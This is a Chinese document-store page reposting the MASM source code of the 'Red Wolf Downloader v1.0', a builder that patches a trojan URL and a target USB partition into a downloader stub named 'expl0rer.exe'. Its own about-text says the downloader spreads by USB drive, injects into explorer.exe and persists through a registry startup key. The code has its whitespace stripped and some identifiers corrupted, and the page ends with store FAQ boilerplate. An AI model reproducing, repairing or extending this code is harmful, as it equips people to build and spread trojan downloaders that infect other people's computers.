ghost木马分析以及源码

红狼下载者v1.0源代码减小字体增大字体作者:佚名:本站整理发布时间:2007-8-1620:25:04;******************************************************;程序编写byAsm;日期:2006-12-25日凌晨;出处:wwwolfexp/(红狼安全小组);注意事项:如欲转载,请保持本程序的完整,并注明:;转载自红狼安全小组(wwwolfexp/);******************************************************.386.modelflat,stdcalloptioncasemap:none;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;Include文件定义;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>includewindows.incincludeuser32.incincludelibuser32.libincludekernel32.incincludelibkernel32.libincludeshell32.incincludelibshell32.libModifyFilePROTO:LPSTR;函数声明;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;Equ等值定义;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>ICO_MAINequ1000h;图标DLG_MAINequ1IDC_URLequ1001IDC_Uequ1002IDC_Aboutequ1003IDC_Outequ1004IDC_Wolfequ1005;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;数据段;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.data?hInstancedd?hWindowdd?hFiledd?hMapdd?pMapAddrdd?.dataszUrldb156dup(0)szUdb156dup(0)FileNamedb'expl0rer.exe',0s主题extdb'下载者配制成功!',0szCaptiondb'恭喜',0szCIdb'G:\',0szMumadb'wwwolfexp.exe/muma.exe',0szSurydb'你总该输入点什么东西吧^_^',0szAboutdb'这个下载者通过U盘传播,至于传播的U盘分区则是自己选择,H:\或者G:\,默认是H:\',0dhdb'注入explorer.exe进程,无dll,注册成注册表启动。可能在下个版本设置成系统服务的方式',0dhdb'如果你有什么好的建议,可以到红狼安全小组找我讨论',0dhdb'程序编写byAsm红狼安全小组[C.R.S.T]',0dh,0ah,0s主题itdb'关于工具的一点说明',0szWolfdb'wwwolfexp/',0szErorrdb'没有找到原始服务端,无法进行配置!',0;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;代码段;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.code;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>_Processproclocal@stFindFile:WIN32_FIND_DATAinvokeFindFirstFile,addrFileName,addr@stFindFile;查找是否有服务端.ifeax==INVALID_HANDLE_VALUEinvokeMessageBox,NULL,addrszErorr,NULL,MB_OK.elseifinvokeCreateFile,addrFileName,GENERIC_READorGENERIC_WRITE,\;打开它FILE_SHARE_READorFILE_SHARE_WRITE,NULL,OPEN_EXISTING,\FILE_ATTRIBUTE_NORMAL,NULLifeax!=INVALID_HANDLE_VALUEmovhFile,eax;保存句柄invokeCreateFileMapping,hFile,NULL,PAGE_READWRITE,0,0,NULL;建立内存共享.ifeax!=NULLmovhMap,eax;保存句柄invokeMapViewOfFile,hMap,FILE_MAP_WRITE,0,0,NULL;读取内存共享.ifeax!=NULLmovpMapAddr,eax;保存句柄invokeModifyFile,pMapAddr;修改服务端内存里内容invokeUnmapViewOfFile,pMapAddr;解除文件映射.endifinvokeCloseHandle,hMap;关闭内存映射文件.endifinvokeCloseHandle,hFile;关闭文件.endif.endifret_Processendp;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>ModifyFileprocusesebxesiedi,lpBufferAddress:LPSTRmovedi,lpBufferAddress;得到内存地址addedi,0010a0h;得到要写入的U盘分区的地址invokelstrcpy,edi,addrszU;修改edi地址处的内容为szU所保存的xoredi,edi;清空这个edi,免得物理内存地址重复movedi,lpBufferAddress;重新得到内存地址addedi,001a24h;得到要写入的木马的地址invokelstrcpy,edi,addrszUrl;修改edi地址处的内容为szUrl所保存的invokeMessageBox,NULL,addrs主题ext,addrszCaption,MB_OK;提示配置成功retModifyFileendp;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>_ProcDlgMainprocusesebxediesihWnd,wMsg,wParam,lParammoveax,wMsg.ifeax==WM_CLOSEinvokeEndDialog,hWnd,NULL.elseifeax==WM_INITDIALOGinvokeLoadIcon,hInstance,ICO_MAINinvokeSendMessage,hWnd,WM_SETICON,ICON_BIG,eaxinvokeSetDlgItemText,hWnd,IDC_URL,addrszMumainvokeSetDlgItemText,hWnd,IDC_U,addrszCI.elseifeax==WM_COMMANDmoveax,wParam.ifax==IDOKinvokeGetDlgItemText,hWnd,IDC_URL,addrszUrl,sizeofszUrlinvokeGetDlgItemText,hWnd,IDC_U,addrszU,sizeofszUinvokelstrlen,addrszUrl.ifax==NULLinvokeMessageBox,NULL,addrszSury,NULL,MB_OK.elseifcall_Process.endif.elseifax==IDC_AboutinvokeMessageBox,NULL,addrszAbout,addrs主题it,MB_OK.elseifax==IDC_OutinvokeExitProcess,NULL.elseifax==IDC_WolfinvokeShellExecute,0,0,addrszWolf,0,0,SW_SHOW.endif.elsemoveax,FALSEret.endifmoveax,TRUEret_ProcDlgMainendp;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>start:invokeGetModuleHandle,NULLmovhInstance,eaxinvokeDialogBoxParam,hInstance,DLG_MAIN,NULL,offset_ProcDlgMain,NULLinvokeExitProcess,NULL;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>endstart

1、当您付费下载文档后,您只拥有了使用权限,并不意味着购买了版权,文档只能用于自身使用,不得用于其他商业用途(如 [转卖]进行直接盈利或[编辑后售卖]进行间接盈利)。
2、本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供参考,付费前请自行鉴别。
3、如文档内容存在侵犯商业秘密、侵犯著作权等,请点击“举报”。

常见问题具体如下:

1、问:已经付过费的文档可以多次下载吗?

      答:可以。登陆您已经付过费的账号,付过费的文档可以免费进行多次下载。

2、问:已经付过费的文档不知下载到什么地方去了?

     答:电脑端-浏览器下载列表里可以找到;手机端-文件管理或下载里可以找到。

            如以上两种方式都没有找到,请提供您的交易单号或截图及接收文档的邮箱等有效信息,发送到客服邮箱,客服经核实后,会将您已经付过费的文档即时发到您邮箱。

注:微信交易号是以“420000”开头的28位数字;

       支付宝交易号是以“2024XXXX”交易日期开头的28位数字。

客服邮箱:

biganzikefu@outlook.com

所有的文档都被视为“模板”,用于写作参考,下载前须认真查看,确认无误后再购买;

文档大部份都是可以预览的,笔杆子文库无法对文档的真实性、完整性、准确性以及专业性等问题提供审核和保证,请慎重购买;

文档的总页数、文档格式和文档大小以系统显示为准(内容中显示的页数不一定正确),网站客服只以系统显示的页数、文件格式、文档大小作为依据;

如果您还有什么不清楚的或需要我们协助,可以联系客服邮箱:

biganzikefu@outlook.com

常见问题具体如下:

1、问:已经付过费的文档可以多次下载吗?

      答:可以。登陆您已经付过费的账号,付过费的文档可以免费进行多次下载。

2、问:已经付过费的文档不知下载到什么地方去了?

     答:电脑端-浏览器下载列表里可以找到;手机端-文件管理或下载里可以找到。

            如以上两种方式都没有找到,请提供您的交易单号或截图及接收文档的邮箱等有效信息,发送到客服邮箱,客服经核实后,会将您已经付过费的文档即时发到您邮箱。

注:微信交易号是以“420000”开头的28位数字;

       支付宝交易号是以“2024XXXX”交易日期开头的28位数字。

笔杆子文秘
机构认证
内容提供者

为您提供优质文档,供您参考!

确认删除?